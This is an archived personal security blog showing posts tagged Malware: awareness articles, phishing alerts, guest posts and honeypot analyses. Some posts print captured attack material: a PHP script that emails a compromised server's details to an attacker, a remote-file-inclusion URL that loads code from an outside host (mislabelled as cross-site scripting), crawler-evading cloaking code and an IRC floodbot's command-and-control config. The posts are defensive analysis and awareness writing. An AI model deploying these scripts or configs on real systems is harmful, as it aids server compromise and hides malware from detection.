This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.
Showing posts with label Malware. Show all posts
Showing posts with label Malware. Show all posts

Oct. is Cyber Security Awareness Month! Will you be Cyber Safe this Holiday Season?

Not only is October Breast Cancer Awareness Month, but October is also Cyber Security Awareness Month! The following are a few talking points which would be great to discuss with family, friends, and co-workers, to help spread awareness and keep yourself, and others, safe online.

Attacks Against Point of Sale Machines on the Rise
Myth: If I don't own a computer, I don't have to worry about cyber security.

Fact: Cyber Security affects everyone, even those without computers.

Did you know that you could become a victim of a cyber crime without ever owning a computer or smart phone?

Over just the past two years, cyber attacks against Point of Sale machines have drastically increased. What initially started as a collection of isolated incidents has quickly grown into a continuous stream of attacks against major retailers.

Cyber criminals have learned that it's much easier to attack the Point of Sale machines directly, instead of attacking the databases retailers use to store payment information. This means an increased threat to consumers and merchants.

Targeted Malware Attacks Against USPS Customers Using Location in Malware Filename

A friend contacted me today with an interesting piece of malware he received in his inbox. A "delivery notification" stating that USPS couldn't make a delivery, and requesting you to download and print out the attached label to claim your package.

Screenshot of original email

What makes this malware interesting is that it is clearly targeted, in that the malware sender knows the city of the email recipient.  In this case, the malware was named USPS_Label_Hagerstown.zip.

Target Data Breach Outlines Need for Application Whitelisting, Flaws in PCI-DSS

As I find myself diving deeper down the rabbit hole of the recent Target data breach and the malware writers behind it, I can't help but keep asking "Why were no safeguards put in place to prevent this?"

For those who didn't hear, there has been an arrest of two Mexican citizens in Texas who were using stolen credit card numbers to purchase goods - and that the case possibly leads back to the Target data compromise.

Quite honestly, with today's computer security suites, there is almost no excuse for a static configured system such as a Point of Sale terminal to ever be infected by a virus. With proper implementation of application whitelisting a system can be protected from even unknown malware.

However, the Payment Card Industry Data Security Standard (PCI-DSS) only requires basic anti-virus coverage to protect against "known" malware, as well as a (network-based) firewall.

Computer Code Could Potentially Infect Biological DNA via @SPTHvx

A research paper recently posted to Pastebin titled "Infection of biological DNA with digital Computer Code" claims a theoretical method which could be used by self-replicating malware to alter DNA.

The infection vector is somewhat similar to Stuxnet - infect computer systems then alter "fasta" files containing DNA information. When the altered files are synthesized, the computer code makes the transition into the biological realm as bacteria, where it continues to self replicate as a living organism.

I am by no means a microbiologist (and neither is the author of the paper), so I can't very easily confirm or deny the paper's contents. It sounds plausible, but then again it could have easily been created by modifying a paper generated by the CS Paper Generator.

The paper author is on twitter @SPTHvx.

Apparently a proof of concept virus is on SPTHvx's website.

Analysis of the proof of concept virus available at the following locations:

VirusTotal: https://www.virustotal.com/en/file/9aea60ee1796d711d166397a8407bef081a78849c6904ab9baf377155fb6630a/analysis/1387340634/

Anubis: http://anubis.iseclab.org/?action=result&task_id=17ea94fb60cbfe2a4ed4924b31e1ae344

Beware of Paul Walker Malware Emails

With the death of Paul Walker, be on the lookout for emails containing malware exploiting the news of the celbrity's death.

Often these emails will claim to have "leaked photos" etc.

Be vigilant.

Examining a Suspect Android Apk - FCC Speed Test

Recently the FCC released a "FCC Speed Test" application for Android.

Of course, the paranoid among us will claim that the app may be designed to secretly spy on you.

Fortunately there are Android app analysis sites out there, such as Anubis. These sites will automatically analyze an application for you and tell you everything it does.

I went ahead and analyzed the FCC Speed Test application, and the report is available here.

I have to admit, looking at the results doesn't feel very reassuring. The app is supposed to measure broadband speeds and report back to the FCC. But an interesting question is, why does the app contain IP addresses used to connect to internal networks?

Guest Post: Malware search checks online security for text you highlight

NOTE: The following is a guest post by Courtney Gordner. The blog maintainer is not responsible for its contents.

Security is a huge issue in today’s digital world, especially since we now keep so much of our personal information stored on mobile devices and computers. Just stop for a moment and think about how much dangerous software there is floating around out there, it’s enough to drive someone mad.
Malware and spyware can log information and keep track of what we’re doing when we use a computer. A simple virus could take down a working device and ruin an entire day’s worth of work or more. Those are a couple of the most common threats, but the list goes on and on. It goes without saying, there are a lot of dastardly things that could be accomplished with our sensitive data- especially if someone were able to monitor keystrokes and log passwords.
Long story short, security is important all the time. You would think with everything so streamlined and instant, that digital security would be the same way. In most cases, it’s not. To remain protected, you have to install third party security software, which generally does not offer streamlined support unless you pay a heavy premium. Of course, there are security firms that offer features like free email and file scanning, but they’re the exception more than they are the rule. Still, what do you do when you want streamlined protection? What do you do when you want to know right away if a download or URL is safe to visit?
With Malware Search, scans can actually be activated instantly. Once the software has been installed on your computer, you can right-click on a link (including download URLs) to scan the target using several different malware databases. It relies on a variety of sources like Threat Expert, Process Library, and Microsoft’s Malware Protection Center to ensure target links are safe to visit. It’s similar to VirusTotal, in that it uses a large collection of remote security engines to do the work, except Malware Search does it in a much more convenient way. With VirusTotal you have to download a package first, and then scan it. With Malware Search, you can just right click on an item and figure out what you need to. It’s streamlined, and most importantly always available.
Better yet, you can also check to see if a particular URL or web address is safe by viewing its Web of Trust listing.
Malware Search comes as a browser extension for both Chrome and Firefox. While the add-on itself hasn’t been updated in some time, the malware databases it uses are constantly being improved. Even though it’s an older extension it still works great with the latest versions of the aforementioned browsers.
Malware Search keeps you from going in blind because you can scan any link or URL and find out enough information to know whether or not it’s safe to visit. Unfortunately, there are no mobile variants of the software, so it’s for desktop use only. You can pick it up for Google Chrome from the Chrome Web Store, or Firefox from the Mozilla Add-ons page. When a site is infected with malware, they are kicked off Google which makes their SEO ranking go down. It’s important for you to understand if you run your own website the risks involved in becoming infected. Make sure you are using SEO Tools to see how you’re site is doing in searches so you can stay ahead of the game.

Courtney Gordner is a blogger/journalist who loves writing on any topic! Read more from her at her blog, www.talkviral.com

Tricks of the Trade - New Whitepaper Available (Malware evading Intrusion Detection)

I'm happy to announce that I've completed my whitepaper on how malware attempts to evade detection by intrusion detection systems.

In this paper I take a look at how malware attempts to evade detection by both network-based and host-based intrusion detection systems through some very clever techniques. All of the malware featured was captured by my own personal honeypots.

Please view or download the paper over at Scribd:
Tricks of the Trade - How Malware Authors Cover Their Tracks

#ALERT: As Tensions Escalate with Syria, Beware Phishing Attacks

As tensions escalate with Syria, it is highly probable that phishing attacks will begin accompanying real news articles.

A common tactic used by malware writers and phishing senders is to exploit recent news to get you to download their malicious files.  This could be through a well crafted email with an embedded link, or infected attachment, claiming to be a real news article.

The most important step you can take is to be vigilant, and don't click on links within emails, even if they appear to original from friends. A common tactic now used by scammers and phishers is to compromise someone's email account, then use that email account to send messages to the person's contacts.

Also, don't expect this to just be through email.  Many spammers and phishers are now using social media, including Facebook and Twitter messages.

Know the signs of targeted spear phishing. If you work for the government, or are employed by a government contractor, you will be a prime target.  Spearphishing directed towards you may appear very credible, and may even be sent to your work email address.

Stay Vigilant.

A Look At A Simple PHP Cross Site Scripting Attack

Someone was recently kind enough to attack my honeypot with an extremely simple PHP cross site scripting attack, suitable for teaching others.

How does a PHP cross site scripting attack work? Some PHP scripts allow loading of external scripts through special HTTP parameters. For example, am attacker could invoke a PHP cross site scripting attack against a vulnerable file using a URL such as:
http://myhoneypot.net/scripts/php/vulnerablescript.php?src=http://malwaresite.info/malware.php
The above attack would result in vulnerablescript.php executing malware.php.

One of the simplest attacks I've seen is detailed in the following lines:

<?php
$language = 'eng';
$auth     = 0;
$name     = ''; // md5 Login
$pass     = ''; // md5 Password
/**************************************************************************************************************************************************************/
error_reporting(0);
$time_shell = "".date("d/m/Y - H:i:s")."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode ='setoran @'.gethostbyname($_SERVER['SERVER_NAME']).'';
$to_email = 'komixobh@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";
$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode
Reply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
?> 
In this attack, the server sends an email message to komixobh@gmail.com providing the server name and URL exploited. This effectively tells the attacker where their scanning script succeeded, so that they can attack with more advanced scripts.

Quite genius really, don't let the server admin see your full capabilities in case it's a honeypot. Unfortunately for our attacker, this script reveals his email address (komixobh@gmail.com) which is being posted publicly on my blog. My blog is frequented by spam crawlers on a regular basis, so hopefully komixobh enjoys speaking with Nigerian Princes and receiving offers for male "enhancement" drugs.

The exploit really is that simple though, write a PHP script, upload it somewhere, and exploit vulnerable scripts with cross site scripting.

This is why it's important to always maintain current security patches, and follow vendor and industry best practices for securing your web applications.

You can see more example PHP scripts at my Malware Analysis Google Code page.

URGENT! McAfee VirusScan Artemis False Positives!

I've been tipped off that McAfee VirusScan's Artemis Global Threat Intelligence is triggering numerous false positives.

I do not have details on this (and if anyone has further details please post them), but McAfee has made the following KB article available:

https://kc.mcafee.com/corporate/index?page=content&id=KB78993

According to sources online, Artemis is deleting numerous files making machines inaccessible.

Coming Changes and Improvements to Caffeine Security Blog

Over the past year I've gathered a lot of logs and malware information from my honeypot. The biggest challenge has always been - what to do with the information once I gather it.

I've recently started sharing the more significant events through ThreatConnect, but really feel some of this data should be shared with a wider audience.

I'm thinking of implementing a couple things:

  • Tracking of threat indicators through my Malware Analysis Google Code site's Wiki
  • Tracking of threat attack patterns through Google Calendar
  • ...?

Something else I'm considering is building a "Linux Rescue Disk" for analysis and remediation of malware infected Windows systems. All included software would be 100% open source. Not only would I build this for my own use, but I'd also make an ISO available free of charge.  I know there are distros out there already aimed at doing this, but I'm really considering making my own Caffeine Security branded distro.

Do you have any recommendations on additional methods of using the data I've collected? Or recommendations for my Linux rescue disk? If so I'd love to hear from you.  You can comment below or email me CaffSecBlog <at> Gmail <dot> com

Come Join Me On @ThreatConnect and Share Cyber Threat Intelligence

ThreatConnect is a new site providing the ability to share intelligence on Advanced Persistent Threats and other hacking incidents/perpetrators.

I have recently setup an account on the site, and have started adding incidents from my honeypot.

ThreatConnect allows recording and sharing of threat indicators and incidents, including hosts, file hashes, malicious email addresses, and more!



Are you interested in exchanging data? If so, please sign up for an account with ThreatConnect, then send me a connection invite.  The email address you'll need to send the invite is in the screenshot below.


New PHP Malware Source Available for Analysis

After about a month of running my Glastopf honeypot, I've started getting some hits.

You can take a look at the files I've collected (including deobfuscated code) over at my malware analysis site.

One thing which stands out me in some of the malware is that it intentionally hides from being cached by search engines using the following code:

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

See something else worth discussing? Post it here!

FREE CLASS!!! Malicious Software and its Underground Economy

Starting June 13 I will be taking the free Coursera course "Malicious Software and its Underground Economy".

The course will explore the world of malicious software, and look at how it's used to generate millions of dollars per year.

If you have some programming experience, as well as security experience, I'd like to encourage you to sign up!

IRC Floodbot Placed on My Honeypot

Someone dropped off an IRC Floodbot today on my honeypot.

It's nothing spectacular or groundbreaking, and appears to have been around since at least 2009, maybe earlier.

I've replaced the binaries with VirusTotal analysis, and posted everything else as I received it.

You can browse the shell scripts, as well the the malware's help file, at my Google Code site.

By the way, here's the config info for the bot's command and control center:
NICK Hack
USERFILE 1
CMDCHAR *
LOGIN eliata
IRCNAME juno boot flood
MODES +ix-ws
TOG CC 0
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 1
TOG NOIDLE 1
CHANNEL #m0atrea
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nt
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1
SERVER irc.deadly-co.ro 6667

I hope you enjoy examining the bot.

Hacker's Breakfast - Absolutely Great Learning Experience

Today I had the privilege of attending a free training seminar today put on by TrainACE called "The Hacker's Breakfast".  The topic of the day was advanced persistent threats and one of my favorite topics - honeypots.

Not only did I get a free breakfast, but I learned a lot from Alex Lanstein of FireEye and Timber Wolfe of Neustar, Inc.

If you haven't attended one of these yet - I would strongly encourage you to do so.  TrainACE provides the training completely free of charge - and you'll get to learn about some of the other training opportunities which are coming up.

This wasn't your typical "free advertisement disguised as a seminar".  In fact the training provided was extremely informative and useful - and there wasn't any pressure to buy anything or sign up for any future training classes.

I'd like to give a big shout out to Megan Horner for inviting me to the event.  Megan recently submitted a guest blog post which you can view here.


The Cyber Security "Silver Bullet" is Finally Here!

Due to the overwhelming demand for an "all-in-one" security solution, Caffeine Security is happy to announce our solution, which we are releasing as "Caffeine Security Silver Bullet".  This net appliance will be the ultimate solution to all of your security needs.


Guest Post: Ransomware Threat Escalates Worldwide (from @pentesttraining)

The following is a guest post submitted to Caffeine Security. The owner of Caffeine Security is not responsible for its content.

Consumers face a growing malware threat that echoes the fear and helplessness of a kidnapping. The latest malware ploy, called ransomware, literally holds a user’s data hostage. In return for the promise of unlocking the computer or cell phone, digital kidnappers demand money or potentially lucrative information. Experts estimate that ransomware netted criminals over $5 million in 2012 alone.

Detecting Targeted Malware and Advanced Persistent Threats

When dealing with malware, typically your last line of defense is your antivirus.  In order for malware to slip past antivirus scanning software, the malware needs to first bypass your perimeter network defenses, such as Network Intrusion Prevention System (NIPS) and network firewall, as well as your Host Intrusion Prevention System (HIPS) and host based firewall.  Multiple layers of protection should block a large number of threats to your organization.

Typically, most of the malware which will bypass all of your security layers is targeted malware...never before seen in the wild.  If the malware is advanced enough, it will be able to slip past your heuristics defenses, and since it has never been seen in the wild, will go unnoticed by your signature based antivirus scans.

If you're fortunate enough to detect some sign of trouble, the first thing you should do is begin checking common malware load points.  Don't bother trying to look for the proverbial "needle in a haystack" and find the file which infected your system.  Be aware that there are only a few load points which will be used by malware, and begin your search there.